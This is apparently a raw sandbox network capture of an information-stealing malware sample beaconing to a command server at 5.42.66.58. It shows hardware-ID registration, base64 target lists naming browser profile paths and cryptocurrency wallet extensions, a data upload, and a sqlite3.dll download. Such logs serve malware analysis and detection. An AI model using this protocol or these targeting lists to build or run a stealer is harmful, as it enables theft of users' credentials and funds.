12	192.168.2.4	49759	5.42.66.58	80	7684	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:52.763539076 CET	412	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD Host: 5.42.66.58 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 37 30 45 35 34 33 30 44 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"2E70E5430D901942779736------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"default4------KJKEHIIJJECFHJKECFHD--
Dec 27, 2023 18:12:53.776282072 CET	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 144 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4e 44 63 34 4d 44 4d 35 4d 54 63 78 4e 54 42 6a 4e 6a 41 7a 4e 7a 59 30 5a 54 4e 69 5a 54 6b 33 4d 54 4d 32 4e 6d 59 30 4f 57 52 68 59 57 4a 6c 5a 47 4e 6d 4d 57 49 31 4d 6a 56 6d 59 32 46 68 5a 44 52 6b 59 6d 59 79 4d 44 6b 33 59 6a 67 30 4f 54 51 79 4e 44 49 79 5a 44 4e 69 4e 57 55 31 66 47 52 76 62 6d 56 38 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: NDc4MDM5MTcxNTBjNjAzNzY0ZTNiZTk3MTM2NmY0OWRhYWJlZGNmMWI1MjVmY2FhZDRkYmYyMDk3Yjg0OTQyNDIyZDNiNWU1fGRvbmV8NTE5NTU1NS5maWxlfDF8MXwxfDF8MXwxfDF8MXw=
Dec 27, 2023 18:12:54.119019985 CET	465	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB Host: 5.42.66.58 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="message"browsers------HDBGHDHCGHCAAKEBKECB--
Dec 27, 2023 18:12:54.516011953 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
Dec 27, 2023 18:12:54.516030073 CET	430	IN	Data Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
Dec 27, 2023 18:12:54.535073042 CET	464	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJEGIEBFIJJKFIIIJ Host: 5.42.66.58 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------AEGHJEGIEBFIJJKFIIIJContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------AEGHJEGIEBFIJJKFIIIJContent-Disposition: form-data; name="message"plugins------AEGHJEGIEBFIJJKFIIIJ--
Dec 27, 2023 18:12:54.933720112 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5412 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
Dec 27, 2023 18:12:54.933759928 CET	1286	IN	Data Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
Dec 27, 2023 18:12:54.933774948 CET	1286	IN	Data Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
Dec 27, 2023 18:12:54.933819056 CET	1286	IN	Data Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ
Dec 27, 2023 18:12:54.933901072 CET	464	IN	Data Raw: 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d Data Ascii: bXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxTYWZlUGFsIEV4dGVuc2lvbiBXYWxsZXR8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8QmFja3BhY2t8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2x
Dec 27, 2023 18:12:56.611296892 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH Host: 5.42.66.58 Content-Length: 8255 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:12:56.611341953 CET	8255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 27, 2023 18:12:57.701107979 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:12:58.675863981 CET	89	OUT	GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:12:59.069000006 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:58 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 